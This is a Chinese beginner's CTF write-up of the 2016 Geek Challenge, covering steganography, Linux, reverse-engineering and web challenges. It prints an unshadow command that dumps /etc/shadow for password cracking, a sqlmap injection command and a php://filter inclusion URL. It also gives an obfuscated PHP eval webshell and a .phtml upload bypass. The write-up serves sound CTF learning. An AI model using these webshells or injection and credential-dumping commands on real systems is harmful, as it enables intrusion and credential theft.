2016第七季极客大挑战Writeup

Posted 2020-08-17

     第一次接触CTF，只会做杂项和一点点Web题……因为时间比较仓促，写的比较简略。以后再写下工具使用什么的。

     纯新手，啥都不会。处于瑟瑟发抖的状态。

一、MISC

1.签到题

     直接填入题目所给的SYC{We1c0m3_To_G33k_2O!6}  

     并且可以知道后边的题的Flag格式为 SYC{}

 

2.xiao彩蛋

     题目提示关注微博，从Syclover Team 博客（http://blog.sycsec.com）可获取到三叶草小组微博，私信发送flag后即可得到。

  

3.闪的好快

      一开始拖进PS分帧数查看，发现二维码都是一半一半不完整的……直接找了个在线分解了一下，共18帧，一帧一阵扫即可。

 

4.Come_game

      打了一分钟就放弃了。手残党第一层三个刺那儿就过不去。关闭游戏后，发现生成两个文件，猜测DeadTime是保存死亡次数的，save1保存游戏关卡信息。

      删除后这两个文件后，观察发现进入死亡次数、时间信息时，生成DeadTime，进出关卡后生成save1。

      查看两个文件的修改时间（左为save1，右为DeadTime），在试玩时保持了在第一关存档点时不死亡，因此可以知道之前的猜测是正确的。

 

 

       用十六进制编辑器HexEditXP打开save1，修改关卡信息，尝试后发现共5关，修改即可。

 

 

5.Snow

     打开网页，查看源码得到key。

 

     提示是html隐写，通过关键词搜索，可以查到有snow隐写。将key和网址一并丢入解码网（http://fog.misty.com/perry/ccs/snow/snow/snow.html），就可以得到Flag。

 

6.旋转跳跃

     一个mp3文件，题目写着“熟悉的声音中貌似又隐藏着啥”，由题目信息，可以知道是MP3隐写，使用MP3stego（http://www.petitcolas.net/steganography/mp3stego/）可解。

 

7.凯撒部长的奖励

      给了一串类似于Flag格式的字符串，结合题目“凯撒”，可以知道是凯撒加密，以Flag格式可知需要将MSW移至SYC，即右移6位即可。可以写代码跑，也可以丢进相关的解密网站跑。

 

8.MD5cracker

      给定字符串01540f319ff0cf88928c83de23l27fbb，根据题目提示进行MD5解密查询，发现无效。观察发现其中有个l，改为1，再次查询解密后得到Flag。

 

 

9.PEN_AND_APPLE

      给了一段极其羞耻的MP4格式的视频，由于是MISC题，联想到视频隐写，搜索之，但只查到WAV格式的。提示是Windows下命令行，查阅《数据隐藏技术解密》一书的Windows相关内容，了解到是NTFS数据流隐写。

 

 

    通过搜索可知使用相关工具进行解密。但第一次尝试时未出Flag，反而出现了自己在动手实验时修改过的隐藏内容（然后把自己给误导了）……

 

    查阅后发现只能用WinRar进行解压，否则会使隐藏文件损失。

    可以在命令行下提取（使用lads和streams进行操作）或者使用NTFS Stream Info工具查看。

 

10.藏着小秘密的流量包

      下载后发现是pcapng文件，根据提示“用手机共享”，搜索蓝牙传输协议，即OBEX，用WireShark分析，定位可以看到，传输了一个名为“secret.rar”的压缩包，提取出来就能得到Flag。

     

二、Linux

1.linux_1

      在Ubuntu环境下进入docker，在 /usr/local/etc/geek/ 下取出第一个Flag。

2.linux_2

      通过docker目录文件查看，发现有个Flag2.swp，以“swp文件”为关键词进行搜索，查到这是vi非正常退出而产生的swp文件，通过vi -r {your file name} 这个命令可以恢复。

3.linux_3

     题目描述flag是某用户的登陆密码，通过Docker下查询发现有个用户名与syc相关的。

     linux下用户密码的储存位置是/etc/passwd以及/etc/shadow

     提取出来后，使用工具John，写字典进行爆破即可。

     unshadow /etc/passwd /etc/shadow > mypasswd

 

参考资料：http://www.cnblogs.com/iamstudy/articles/linux_password_shadow.html 

              http://www.heblug.org/chinese_docker/userguide/

              http://blog.csdn.net/lingdxuyan/article/details/4993868 

 

三、Program

compress300

      题目是一个300层的压缩包，且压缩包内文件无后缀名。

      偷懒直接用了个按键精灵，不断解压、修改文件后缀。得到Flag。

 

四、Reverse

re10-一起嗨皮

      只会这个。觉得逆向学习周期太长，听了一位师傅的建议，暂时先放下了RE。

      这题用OD找到字符串就可以啦……

 

五、Web

1.web_1

    F12看一下HTTP响应头，得到Flag。

 

 

2.web_2

     打开网页，提示not admin

     

 

     抓包，改一下whoami和root即可。

 

 

3.Social Engineering

     一道社工题。

 

 

      通过在线社工库，用邮箱查询可以知道邮箱主人的姓名是“肖力”，下边提示说“有贴吧的伪男”，进入 百度“肖力吧”，可以看到在有一贴子在比赛时间点时发布，提供了一个QQ号。查看该QQ号内容。发现发了一张图……还以为是图片隐写，尝试无果。

 

  于是查看留言板内容，发现提示域名的注册人联系号码就是Flag。然后上万网查询比赛官网WHOIS得到答案。

 

4.sqli1

      查看源码，有个tips。

 

     可以得到参数是sycid，使用SQLMAP对该网址

    （http://web.sycsec.com/d03e52c272e42e7c/?sycid=1）尝试注入（在Linux环境下）。

     检测注入点——爆库——爆表段——爆字段——Dump。

     sqlmap -u "http://web.sycsec.com/d03e52c272e42e7c/?sycid=1" -D sycsqli1 -T “#FL4G#” --columns 

     这里#FL4G#需要加个引号包含这个字段。

 

参考资料：http://nouername.github.io/2016/06/17/sql注入/ 

              https://www.nigesb.com/sqlmap-common-usage-and-examples.html 

              http://www.legendsec.org/1111.html 

          

5.sqli2

    使用Burp抓包,改Debug=1 

    通过逻辑运算符XOR，使用万能密码，返回1即可

 

6.人生苦短

     “交提”计算结果后查看源代码，得到一大串编码，使用在线解码，发现是Base64和Base32转来转去，可以用Python调用内置的模块进行解码。

 

7.狗师傅的计算器

     写Writeup的时候已经无法访问这个网页了，只能回忆一下。

     打开后发现是健脑操的一段代码。使用在线解码，得到一个welcome.php页面。

     进入这个welcome页面，随意输入答案后，得到两个链接，有一个链接是robot.txt，联想到网站的robots协议，进入一下这个地址。

     查看这个页面的内容，然后查询资料，有个include，知道这是一个文件包含。

     参考http://www.cnblogs.com/iamstudy/articles/include_file.html ，查询php相关的内容，多次尝试得到一串编码，解密后得到Flag。

 

8.上传1

    看题目后，搜索文件上传漏洞。尝试上传一句话php，提示类型不支持。说明php后缀过滤，查看资料，说是phpstudy可以使用 .php/.php3/.php4/.phtml上传，经过测试，发现.phtml有效。

    使用Burp改成.phtml后上传即可。

 

参考资料：

http://www.icookie.org/文件上传.html 

http://wenku.baidu.com/link?url=wx-44Vq4vEpWGOOVYj9ILZlulUiYDFEbCE5_siaZYdeZJ3g6vvudWNLbMnv5hXvpFYSprWkDUBtMYXk_wYka8VxhwIzETGVAtliBRS783j7 

 

9.文件上传2

      上传成功后，应当getshell了。

      随意上传了一个一句话，访问地址，发现页面上直接显示出php代码了，调的脚本里，’php’被替换掉了，导致一句话无法写入。然而依然不会做。

      之后经一位师傅提示，使用<script>的一句话绕过上传，使用菜刀连接了。

      具体是哪句，不知道丢在哪儿了……所以没交给主办方……

 

——————————————————————

比赛官方推荐的学习链接：

== web ==

文件包含：http://www.cnblogs.com/iamstudy/articles/include_file.html

sql注入：http://www.cnblogs.com/lcamry/category/846064.html

sqli1/sqli2

xss：https://github.com/l3m0n/XSS-Filter-Evasion-Cheat-Sheet-CN

文件上传：http://wenku.baidu.com/link?url=wx-44Vq4vEpWGOOVYj9ILZlulUiYDFEbCE5_siaZYdeZJ3g6vvudWNLbMnv5hXvpFYSprWkDUBtMYXk_wYka8VxhwIzETGVAtliBRS783j7

代码审计：http://wooyun.jozxing.cc/static/drops/papers-4544.html

<script language="pHp">$k="ass"."ert"; $k(${"_PO"."ST"} [‘8‘]);</script>
菜刀

game.sycsec.com:50085/result.php?syc=php://filter/convert.base64-encode/resource=syc

== misc ==

隐写术：http://www.jianshu.com/p/67233f607f75
snow\\旋转跳跃

编码与加密：http://www.tuicool.com/articles/2E3INnm
凯撒部长的奖励

== writeup ==

第五届极客大挑战：http://wooyun.jozxing.cc/static/drops/tips-3434.html
第六届极客大挑战：http://www.tuicool.com/articles/JfqMrq2